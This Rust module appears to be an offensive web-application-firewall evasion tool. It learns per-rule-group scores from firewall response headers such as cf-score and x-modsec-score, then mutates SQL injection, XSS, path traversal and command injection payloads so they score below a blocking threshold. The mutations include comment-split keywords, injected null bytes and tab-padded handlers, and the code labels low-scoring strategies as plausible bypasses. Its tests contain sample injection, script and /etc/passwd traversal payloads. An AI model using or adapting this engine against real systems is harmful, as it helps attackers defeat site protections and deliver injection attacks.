use std::collections::HashMap;
/// Category of detection rule that a payload can be attributed to.
///
/// Variant order is significant: it drives the derived `Ord` and matches the
/// order of [`RuleGroup::ALL`].
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, PartialOrd, Ord)]
#[non_exhaustive]
pub enum RuleGroup {
    /// SQL injection signatures (short name `sqli`).
    SqlInjection,
    /// Cross-site scripting signatures (short name `xss`).
    CrossSiteScripting,
    /// Local/remote file inclusion signatures (short name `lfi_rfi`).
    FileInclusion,
    /// Remote code execution signatures (short name `rce`).
    RemoteCodeExecution,
    /// Fallback group used when no other signature matches (short name `protocol`).
    ProtocolViolation,
    /// Scanner tool names (short name `scanner`).
    ScannerProbe,
}

impl RuleGroup {
    /// Every variant, in declaration order.
    pub const ALL: &'static [Self] = &[
        Self::SqlInjection,
        Self::CrossSiteScripting,
        Self::FileInclusion,
        Self::RemoteCodeExecution,
        Self::ProtocolViolation,
        Self::ScannerProbe,
    ];

    /// Returns the short, stable identifier of this group.
    pub fn name(self) -> &'static str {
        match self {
            Self::SqlInjection => "sqli",
            Self::CrossSiteScripting => "xss",
            Self::FileInclusion => "lfi_rfi",
            Self::RemoteCodeExecution => "rce",
            Self::ProtocolViolation => "protocol",
            Self::ScannerProbe => "scanner",
        }
    }

    /// Attributes `token` to every group whose signature list it matches.
    ///
    /// Matching is an ASCII-case-insensitive substring search. Groups are
    /// reported in the fixed order SQLi, XSS, file inclusion, RCE, scanner.
    /// When nothing matches, the result is `[ProtocolViolation]`, so the
    /// returned vector is never empty.
    pub fn classify_token(token: &str) -> Vec<Self> {
        // Signature table: the order of the rows is the order of the output.
        const SIGNATURES: &[(RuleGroup, &[&str])] = &[
            (
                RuleGroup::SqlInjection,
                &[
                    "select",
                    "union",
                    "or 1",
                    "and 1",
                    "--",
                    "sleep(",
                    "benchmark(",
                    "waitfor",
                    "xp_cmd",
                ],
            ),
            (
                RuleGroup::CrossSiteScripting,
                &["<script", "onerror", "alert(", "javascript:", "<svg", "<img"],
            ),
            (
                RuleGroup::FileInclusion,
                &["../", "..\\", "/etc/passwd", "php://", "file://"],
            ),
            (
                RuleGroup::RemoteCodeExecution,
                &["eval(", "exec(", "system(", "popen(", "; bash", "$("],
            ),
            (
                RuleGroup::ScannerProbe,
                &["nmap", "nikto", "sqlmap", "burp"],
            ),
        ];

        let lowered = token.to_ascii_lowercase();
        let mut matched: Vec<Self> = SIGNATURES
            .iter()
            .filter(|&&(_, needles)| needles.iter().any(|&needle| lowered.contains(needle)))
            .map(|&(group, _)| group)
            .collect();

        // Nothing recognised: fall back to the catch-all group.
        if matched.is_empty() {
            matched.push(Self::ProtocolViolation);
        }
        matched
    }
}
/// A single scored sample that `SubScoreEstimator::observe` learns from.
#[derive(Debug, Clone)]
pub struct ScoreObservation {
/// Payload text for this sample (presumably the request that produced
/// `total_score` — confirm with callers); `observe` does not read it.
pub payload: String,
/// Observed total score; `observe` compares it with the estimator's prediction.
pub total_score: f64,
/// Rule groups attributed to the sample; `observe` splits the prediction error
/// evenly across them, or adjusts the baseline when this list is empty.
pub groups: Vec<RuleGroup>,
}
/// Online estimator that attributes an observed total score to per-group
/// coefficients plus a shared baseline.
#[derive(Debug, Clone)]
pub struct SubScoreEstimator {
    /// Current coefficient of each rule group.
    pub coeffs: HashMap<RuleGroup, f64>,
    /// Step size applied to the prediction error; `new` clamps it to `[0.001, 0.999]`.
    pub alpha: f64,
    /// Observation counter maintained by `observe`.
    pub n_obs: u64,
    /// Offset added to every prediction; only observations without groups adjust it.
    pub baseline: f64,
}

impl SubScoreEstimator {
    /// Creates an estimator in which every group in [`RuleGroup::ALL`] starts
    /// at `initial_coeff`, with a zero baseline.
    ///
    /// `alpha` is clamped to `[0.001, 0.999]`.
    #[must_use]
    pub fn new(initial_coeff: f64, alpha: f64) -> Self {
        Self {
            coeffs: RuleGroup::ALL
                .iter()
                .map(|&group| (group, initial_coeff))
                .collect(),
            alpha: alpha.clamp(0.001, 0.999),
            n_obs: 0,
            baseline: 0.0,
        }
    }

    /// Folds one observation into the model.
    ///
    /// The prediction error is multiplied by `alpha`. With an empty group list
    /// it is applied to the baseline; otherwise it is split evenly across the
    /// listed groups, whose coefficients are then floored at `0.0`.
    ///
    /// Observations whose `total_score` is NaN or infinite are ignored and not
    /// counted in `n_obs`: a NaN error would reset the touched coefficients to
    /// zero (via `max(0.0)`) or turn the baseline into NaN for good.
    pub fn observe(&mut self, obs: &ScoreObservation) {
        if !obs.total_score.is_finite() {
            return;
        }
        self.n_obs += 1;

        let error = obs.total_score - self.predict(&obs.groups);
        if obs.groups.is_empty() {
            self.baseline += self.alpha * error;
            return;
        }

        let per_group_error = error / obs.groups.len() as f64;
        let step = self.alpha * per_group_error;
        for &group in &obs.groups {
            let coeff = self.coeffs.entry(group).or_insert(0.0);
            // Coefficients are never allowed to go negative.
            *coeff = (*coeff + step).max(0.0);
        }
    }

    /// Predicts the total score for `groups`: the baseline plus the sum of
    /// their coefficients (groups without a coefficient count as `0.0`).
    #[must_use]
    pub fn predict(&self, groups: &[RuleGroup]) -> f64 {
        let group_score: f64 = groups
            .iter()
            .map(|&group| self.group_contribution(group))
            .sum();
        self.baseline + group_score
    }

    /// Returns the coefficient of `group`, or `0.0` when none is stored.
    #[must_use]
    pub fn group_contribution(&self, group: RuleGroup) -> f64 {
        self.coeffs.get(&group).copied().unwrap_or(0.0)
    }

    /// Returns the group with the smallest coefficient, or `None` when no
    /// coefficients are stored.
    ///
    /// Ties are broken by `RuleGroup` ordering so the answer does not depend
    /// on `HashMap` iteration order. Coefficients are compared with
    /// `f64::total_cmp`, which gives NaN values a fixed position instead of
    /// treating them as equal to everything.
    #[must_use]
    pub fn lowest_contribution_group(&self) -> Option<RuleGroup> {
        self.coeffs
            .iter()
            .min_by(|&(group_a, coeff_a), &(group_b, coeff_b)| {
                coeff_a
                    .total_cmp(coeff_b)
                    .then_with(|| group_a.cmp(group_b))
            })
            .map(|(&group, _)| group)
    }
}
/// Stateless helper that reads a numeric score from a list of headers.
#[derive(Debug, Clone, Default)]
pub struct ScoreParser;

impl ScoreParser {
    /// Header names (lowercase) that may carry a score.
    const SCORE_HEADERS: [&'static str; 5] = [
        "cf-score",
        "x-waf-score",
        "x-wafaflare-score",
        "x-anomaly-score",
        "x-modsec-score",
    ];

    /// Returns the first usable score found in `headers`.
    ///
    /// Header names are compared ASCII-case-insensitively against a fixed list
    /// of score header names. A matching header is used only when its trimmed
    /// value parses as a finite `f64`; otherwise scanning continues with the
    /// next header. `"NaN"` and `"inf"` parse successfully as `f64`, so they
    /// are rejected explicitly rather than handed to callers as a score.
    ///
    /// Returns `None` when no header yields a finite score.
    #[must_use]
    pub fn extract(headers: &[(String, String)]) -> Option<f64> {
        headers
            .iter()
            .filter(|&&(ref name, _)| {
                Self::SCORE_HEADERS
                    .iter()
                    .any(|&known| name.eq_ignore_ascii_case(known))
            })
            .find_map(|&(_, ref value)| {
                value
                    .trim()
                    .parse::<f64>()
                    .ok()
                    .filter(|score| score.is_finite())
            })
    }
}
/// One candidate plan built by `DilutionPlanner::plan` for a single attack group.
#[derive(Debug, Clone)]
pub struct DilutionStrategy {
/// The active group this strategy keeps as its focus.
pub attack_group: RuleGroup,
/// Every other active group, i.e. all active groups except `attack_group`.
pub suppress_groups: Vec<RuleGroup>,
/// Estimator baseline plus the coefficient of `attack_group`.
pub predicted_total: f64,
/// One payload rewrite per entry of `suppress_groups`.
pub mutations: Vec<DilutionMutation>,
}
/// A rewritten payload together with a description and a predicted score.
#[derive(Debug, Clone)]
pub struct DilutionMutation {
/// The payload after the token rewrite for one suppressed group was applied.
pub payload: String,
/// Human-readable summary of the rewrite that produced `payload`.
pub description: String,
/// Estimator prediction for the strategy's attack group on its own.
pub predicted_score: f64,
}
/// Builds per-group strategies from a score estimator and a score threshold.
#[derive(Debug, Clone)]
pub struct DilutionPlanner {
    /// Model used for every score prediction.
    estimator: SubScoreEstimator,
    /// Predicted totals strictly below this value count as plausible.
    pub threshold: f64,
}

impl DilutionPlanner {
    /// Creates a planner that owns `estimator` and compares predictions
    /// against `threshold`.
    #[must_use]
    pub fn new(estimator: SubScoreEstimator, threshold: f64) -> Self {
        Self {
            estimator,
            threshold,
        }
    }

    /// Produces one strategy per entry of `active_groups`.
    ///
    /// Each strategy keeps one group as the attack group and lists all other
    /// active groups for suppression. The result is sorted by ascending
    /// `predicted_total`; incomparable values (NaN) are treated as equal, and
    /// the sort is stable, so ties keep the order of `active_groups`.
    #[must_use]
    pub fn plan(&self, payload: &str, active_groups: &[RuleGroup]) -> Vec<DilutionStrategy> {
        let mut strategies: Vec<DilutionStrategy> = active_groups
            .iter()
            .map(|&attack_group| {
                let suppress_groups: Vec<RuleGroup> = active_groups
                    .iter()
                    .copied()
                    .filter(|&other| other != attack_group)
                    .collect();
                let mutations =
                    self.build_suppression_mutations(payload, &suppress_groups, attack_group);
                DilutionStrategy {
                    attack_group,
                    predicted_total: self.estimator.baseline
                        + self.estimator.group_contribution(attack_group),
                    suppress_groups,
                    mutations,
                }
            })
            .collect();

        strategies.sort_by(|lhs, rhs| {
            lhs.predicted_total
                .partial_cmp(&rhs.predicted_total)
                .unwrap_or(std::cmp::Ordering::Equal)
        });
        strategies
    }

    /// Builds one mutation per group in `suppress`.
    ///
    /// Every mutation rewrites the original `payload` for that single group
    /// only (rewrites are not accumulated across groups). All of them carry
    /// the same `predicted_score`: the estimator's prediction for
    /// `attack_group` alone.
    fn build_suppression_mutations(
        &self,
        payload: &str,
        suppress: &[RuleGroup],
        attack_group: RuleGroup,
    ) -> Vec<DilutionMutation> {
        // Identical for every mutation of this strategy, so compute it once.
        let predicted_score = self.estimator.predict(&[attack_group]);

        suppress
            .iter()
            .map(|&group| {
                let (rewritten, description) = match group {
                    RuleGroup::SqlInjection => (
                        suppress_sqli_tokens(payload),
                        format!(
                            "SQLi tokens obfuscated (suppress {}) while keeping {}",
                            group.name(),
                            attack_group.name()
                        ),
                    ),
                    RuleGroup::CrossSiteScripting => (
                        suppress_xss_tokens(payload),
                        format!(
                            "XSS tokens obfuscated (suppress {}) while keeping {}",
                            group.name(),
                            attack_group.name()
                        ),
                    ),
                    RuleGroup::FileInclusion => (
                        suppress_lfi_tokens(payload),
                        format!("LFI tokens obfuscated (suppress {})", group.name()),
                    ),
                    RuleGroup::RemoteCodeExecution => (
                        suppress_rce_tokens(payload),
                        format!("RCE tokens suppressed ({})", group.name()),
                    ),
                    RuleGroup::ScannerProbe | RuleGroup::ProtocolViolation => (
                        strip_scanner_tokens(payload),
                        format!("Scanner/protocol tokens stripped ({})", group.name()),
                    ),
                };
                DilutionMutation {
                    payload: rewritten,
                    description,
                    predicted_score,
                }
            })
            .collect()
    }

    /// Returns `true` when the strategy's `predicted_total` is strictly below
    /// the planner's threshold.
    #[must_use]
    pub fn is_plausible_bypass(&self, strategy: &DilutionStrategy) -> bool {
        strategy.predicted_total < self.threshold
    }
}
/// Rewrites SQL keywords in `payload` according to a fixed substitution table.
///
/// Matching is case-sensitive: the table lists all-uppercase forms and, for a
/// subset of keywords, all-lowercase forms. Rules are applied in table order
/// by `apply_replacements`.
fn suppress_sqli_tokens(payload: &str) -> String {
    const SQLI_RULES: &[(&str, &str)] = &[
        // Uppercase keywords.
        ("SELECT", "SE/**/LECT"),
        ("UNION", "UN/**/ION"),
        ("INSERT", "INS/**/ERT"),
        ("UPDATE", "UP/**/DATE"),
        ("DELETE", "DE/**/LETE"),
        ("WHERE", "WH/**/ERE"),
        ("ORDER BY", "ORD/**/ER BY"),
        ("GROUP BY", "GRO/**/UP BY"),
        ("HAVING", "HAV/**/ING"),
        ("SLEEP", "SLE/**/EP"),
        ("BENCHMARK", "BENCH/**/MARK"),
        ("WAITFOR", "WAIT/**/FOR"),
        ("XP_CMDSHELL", "XP_CM/**/DSHELL"),
        // Tautologies.
        ("OR 1=1", "OR (1)=(1)"),
        ("AND 1=1", "AND (1)=(1)"),
        // Lowercase keywords.
        ("select", "se/**/lect"),
        ("union", "un/**/ion"),
        ("insert", "ins/**/ert"),
        ("update", "up/**/date"),
        ("delete", "de/**/lete"),
        ("where", "wh/**/ere"),
        ("sleep", "sle/**/ep"),
        ("benchmark", "bench/**/mark"),
    ];
    apply_replacements(payload, SQLI_RULES)
}
/// Rewrites markup and script tokens in `payload` according to a fixed
/// substitution table.
///
/// Matching is case-sensitive and the rules run in table order via
/// `apply_replacements`.
fn suppress_xss_tokens(payload: &str) -> String {
    const XSS_RULES: &[(&str, &str)] = &[
        ("<script>", "<scr\x00ipt>"),
        ("</script>", "</scr\x00ipt>"),
        ("onerror=", "onerror\t="),
        ("onload=", "on\x00load="),
        ("alert(", "\u{FF41}lert("),
        ("javascript:", "java\x09script:"),
        ("<svg", "<sv\x00g"),
        ("<img", "<i\x00mg"),
        ("eval(", "ev\x00al("),
    ];
    apply_replacements(payload, XSS_RULES)
}
/// Rewrites path-traversal and file-scheme tokens in `payload` according to a
/// fixed substitution table.
///
/// Rules run in table order on the already-rewritten text. As a consequence
/// the `..\` rule also matches the `..\/` produced by the `../` rule, so an
/// input `../` ends up as `..\//`.
fn suppress_lfi_tokens(payload: &str) -> String {
    const LFI_RULES: &[(&str, &str)] = &[
        ("../", "..\\/"),
        ("..\\", "..\\/"),
        ("/etc/passwd", "/e\x00tc/passwd"),
        ("php://", "php\x00://"),
        ("file://", "fi\x00le://"),
    ];
    apply_replacements(payload, LFI_RULES)
}
/// Rewrites command-execution tokens in `payload` according to a fixed
/// substitution table.
///
/// Matching is case-sensitive and the rules run in table order via
/// `apply_replacements`.
fn suppress_rce_tokens(payload: &str) -> String {
    const RCE_RULES: &[(&str, &str)] = &[
        ("eval(", "e\x00val("),
        ("exec(", "ex\x00ec("),
        ("system(", "syst\x00em("),
        ("popen(", "p\x00open("),
        ("; bash", ";\x09bash"),
        ("$(", "$\x00("),
    ];
    apply_replacements(payload, RCE_RULES)
}
/// Removes scanner tool names from `payload`.
///
/// Only the all-lowercase and all-uppercase spellings are removed; mixed-case
/// spellings are left untouched. Names are removed one after another in list
/// order, each in a single pass over the current text.
fn strip_scanner_tokens(payload: &str) -> String {
    const SCANNER_NAMES: [&str; 8] = [
        "nmap", "nikto", "sqlmap", "burp", "NMAP", "NIKTO", "SQLMAP", "BURP",
    ];
    SCANNER_NAMES
        .iter()
        .fold(payload.to_string(), |text, &name| text.replace(name, ""))
}
/// Applies each `(from, to)` pair of `replacements` to `s`, in order.
///
/// Every pair replaces all occurrences of `from` in the text produced by the
/// previous pairs, so a later rule can match the output of an earlier one.
fn apply_replacements(s: &str, replacements: &[(&str, &str)]) -> String {
    replacements
        .iter()
        .fold(s.to_owned(), |text, &(from, to)| text.replace(from, to))
}
/// Outcome of `dilute`: the selected strategy plus summary information about it.
#[derive(Debug, Clone)]
pub struct EnsembleDilutionResult {
/// The first strategy returned by the planner, i.e. the one with the lowest
/// `predicted_total`.
pub strategy: DilutionStrategy,
/// Whether `strategy.predicted_total` is below the threshold passed to `dilute`.
pub plausible_bypass: bool,
/// The mutation of `strategy` with the smallest `predicted_score`, or `None`
/// when the strategy has no mutations.
pub best_mutation: Option<DilutionMutation>,
}
/// Classifies `payload`, plans strategies for the matched groups and returns
/// the one with the lowest predicted total.
///
/// `estimator` is cloned into a temporary planner. Returns `None` only when
/// there is no strategy to pick from. The chosen `best_mutation` is the first
/// mutation with the minimal `predicted_score` (incomparable scores are
/// treated as equal).
#[must_use]
pub fn dilute(
    payload: &str,
    estimator: &SubScoreEstimator,
    threshold: f64,
) -> Option<EnsembleDilutionResult> {
    let active_groups = RuleGroup::classify_token(payload);
    let planner = DilutionPlanner::new(estimator.clone(), threshold);

    // `plan` sorts ascending, so the head is the lowest prediction; an empty
    // group list yields an empty plan and therefore `None`.
    let strategy = planner.plan(payload, &active_groups).into_iter().next()?;
    let plausible_bypass = planner.is_plausible_bypass(&strategy);

    let best_mutation = strategy
        .mutations
        .iter()
        .min_by(|lhs, rhs| {
            lhs.predicted_score
                .partial_cmp(&rhs.predicted_score)
                .unwrap_or(std::cmp::Ordering::Equal)
        })
        .cloned();

    Some(EnsembleDilutionResult {
        strategy,
        plausible_bypass,
        best_mutation,
    })
}
/// Unit tests for classification, score estimation, header parsing, planning
/// and the payload rewrite helpers.
#[cfg(test)]
mod tests {
    use super::*;

    #[test]
    fn rule_group_all_has_expected_count() {
        assert_eq!(RuleGroup::ALL.len(), 6);
    }

    #[test]
    fn rule_group_names_stable() {
        assert_eq!(RuleGroup::SqlInjection.name(), "sqli");
        assert_eq!(RuleGroup::CrossSiteScripting.name(), "xss");
        assert_eq!(RuleGroup::FileInclusion.name(), "lfi_rfi");
        assert_eq!(RuleGroup::RemoteCodeExecution.name(), "rce");
        assert_eq!(RuleGroup::ProtocolViolation.name(), "protocol");
        assert_eq!(RuleGroup::ScannerProbe.name(), "scanner");
    }

    #[test]
    fn classify_token_sqli() {
        let groups = RuleGroup::classify_token("' OR 1=1 UNION SELECT--");
        assert!(groups.contains(&RuleGroup::SqlInjection));
    }

    #[test]
    fn classify_token_xss() {
        let groups = RuleGroup::classify_token("<script>alert(1)</script>");
        assert!(groups.contains(&RuleGroup::CrossSiteScripting));
    }

    #[test]
    fn classify_token_lfi() {
        let groups = RuleGroup::classify_token("../../../etc/passwd");
        assert!(groups.contains(&RuleGroup::FileInclusion));
    }

    #[test]
    fn classify_token_rce() {
        let groups = RuleGroup::classify_token("$(system('id'))");
        assert!(groups.contains(&RuleGroup::RemoteCodeExecution));
    }

    #[test]
    fn classify_token_unknown_falls_to_protocol() {
        let groups = RuleGroup::classify_token("hello world");
        assert!(groups.contains(&RuleGroup::ProtocolViolation));
    }

    #[test]
    fn score_estimator_observe_updates_coefficients() {
        let mut est = SubScoreEstimator::new(5.0, 0.5);
        let obs = ScoreObservation {
            payload: "' OR 1=1--".into(),
            total_score: 30.0,
            groups: vec![RuleGroup::SqlInjection],
        };
        est.observe(&obs);
        assert_eq!(est.n_obs, 1);
        // 5.0 + 0.5 * (30.0 - 5.0) = 17.5
        assert!((est.group_contribution(RuleGroup::SqlInjection) - 17.5).abs() < 0.01);
    }

    #[test]
    fn score_estimator_predict_sums_groups() {
        let est = SubScoreEstimator::new(10.0, 0.1);
        let pred = est.predict(&[RuleGroup::SqlInjection, RuleGroup::CrossSiteScripting]);
        assert!((pred - 20.0).abs() < 0.01);
    }

    #[test]
    fn score_estimator_lowest_contribution_returns_some() {
        let mut est = SubScoreEstimator::new(5.0, 0.5);
        *est.coeffs.get_mut(&RuleGroup::ScannerProbe).unwrap() = 1.0;
        let lowest = est.lowest_contribution_group().unwrap();
        assert_eq!(lowest, RuleGroup::ScannerProbe);
    }

    #[test]
    fn score_estimator_coeff_never_negative() {
        let mut est = SubScoreEstimator::new(5.0, 0.5);
        let obs = ScoreObservation {
            payload: "test".into(),
            total_score: -100.0,
            groups: vec![RuleGroup::SqlInjection],
        };
        est.observe(&obs);
        assert!(est.group_contribution(RuleGroup::SqlInjection) >= 0.0);
    }

    #[test]
    fn score_parser_extracts_cf_score() {
        let headers = vec![("cf-score".to_string(), "35".to_string())];
        let score = ScoreParser::extract(&headers);
        assert_eq!(score, Some(35.0));
    }

    #[test]
    fn score_parser_case_insensitive() {
        let headers = vec![("X-WAF-Score".to_string(), "42".to_string())];
        let score = ScoreParser::extract(&headers);
        assert_eq!(score, Some(42.0));
    }

    #[test]
    fn score_parser_missing_header_returns_none() {
        let headers = vec![("content-type".to_string(), "text/html".to_string())];
        assert!(ScoreParser::extract(&headers).is_none());
    }

    #[test]
    fn score_parser_malformed_value_returns_none() {
        let headers = vec![("cf-score".to_string(), "not_a_number".to_string())];
        assert!(ScoreParser::extract(&headers).is_none());
    }

    #[test]
    fn dilution_planner_plan_returns_strategies() {
        let est = SubScoreEstimator::new(10.0, 0.1);
        let planner = DilutionPlanner::new(est, 40.0);
        let groups = vec![RuleGroup::SqlInjection, RuleGroup::CrossSiteScripting];
        let strategies = planner.plan("' OR 1=1<script>", &groups);
        assert!(!strategies.is_empty(), "must produce at least one strategy");
        assert_eq!(strategies.len(), 2);
    }

    #[test]
    fn dilution_planner_strategies_sorted_by_score() {
        let est = SubScoreEstimator::new(10.0, 0.1);
        let planner = DilutionPlanner::new(est, 40.0);
        let groups = vec![
            RuleGroup::SqlInjection,
            RuleGroup::CrossSiteScripting,
            RuleGroup::FileInclusion,
        ];
        let strategies = planner.plan("payload", &groups);
        for i in 1..strategies.len() {
            assert!(
                strategies[i - 1].predicted_total <= strategies[i].predicted_total,
                "strategies must be sorted by predicted_total ascending"
            );
        }
    }

    #[test]
    fn dilution_planner_bypass_detection() {
        let mut est = SubScoreEstimator::new(5.0, 0.1);
        *est.coeffs.get_mut(&RuleGroup::SqlInjection).unwrap() = 2.0;
        let planner = DilutionPlanner::new(est, 10.0);
        let groups = vec![RuleGroup::SqlInjection, RuleGroup::CrossSiteScripting];
        let strategies = planner.plan("' OR 1=1<script>", &groups);
        let sqli_strategy = strategies
            .iter()
            .find(|s| s.attack_group == RuleGroup::SqlInjection)
            .unwrap();
        assert!(
            planner.is_plausible_bypass(sqli_strategy),
            "SQLi-only strategy should predict below threshold of 10.0"
        );
    }

    #[test]
    fn suppress_sqli_tokens_splits_keywords() {
        let payload = "SELECT * FROM users WHERE 1=1";
        let suppressed = suppress_sqli_tokens(payload);
        assert!(
            !suppressed.to_uppercase().contains("SELECT "),
            "SELECT must be split"
        );
        assert!(suppressed.contains("/**/"), "must contain comment split");
    }

    #[test]
    fn suppress_xss_tokens_obfuscates_script() {
        let payload = "<script>alert(1)</script>";
        let suppressed = suppress_xss_tokens(payload);
        assert!(
            !suppressed.contains("<script>"),
            "raw <script> must be obfuscated"
        );
    }

    #[test]
    fn suppress_lfi_tokens_obfuscates_path() {
        let payload = "../../../etc/passwd";
        let suppressed = suppress_lfi_tokens(payload);
        assert!(
            !suppressed.contains("/etc/passwd"),
            "bare path must be obfuscated"
        );
    }

    #[test]
    fn dilute_returns_result_for_sqli() {
        let est = SubScoreEstimator::new(5.0, 0.1);
        let result = dilute("' UNION SELECT--", &est, 40.0);
        assert!(
            result.is_some(),
            "must return a result for known attack payload"
        );
    }

    // NOTE(review): this test was previously named `dilute_returns_none_for_benign`
    // and asserted nothing. `classify_token` falls back to `ProtocolViolation`
    // for unmatched input, so `dilute` returns `Some` here. The assertions pin
    // that observed behaviour; confirm whether `None` was the intended result.
    #[test]
    fn dilute_benign_payload_falls_back_to_protocol_violation() {
        let est = SubScoreEstimator::new(5.0, 0.1);
        let result = dilute("hello world", &est, 40.0)
            .expect("classify_token always yields at least one group");
        assert_eq!(result.strategy.attack_group, RuleGroup::ProtocolViolation);
        assert!(result.strategy.suppress_groups.is_empty());
        assert!(result.strategy.mutations.is_empty());
        assert!(result.best_mutation.is_none());
    }

    #[test]
    fn dilute_best_mutation_has_lowest_score() {
        let est = SubScoreEstimator::new(5.0, 0.1);
        let result = dilute("' UNION SELECT<script>", &est, 40.0).unwrap();
        if let Some(best) = &result.best_mutation {
            for m in &result.strategy.mutations {
                assert!(
                    m.predicted_score >= best.predicted_score - 1e-9,
                    "best_mutation must have minimum predicted score"
                );
            }
        }
    }
}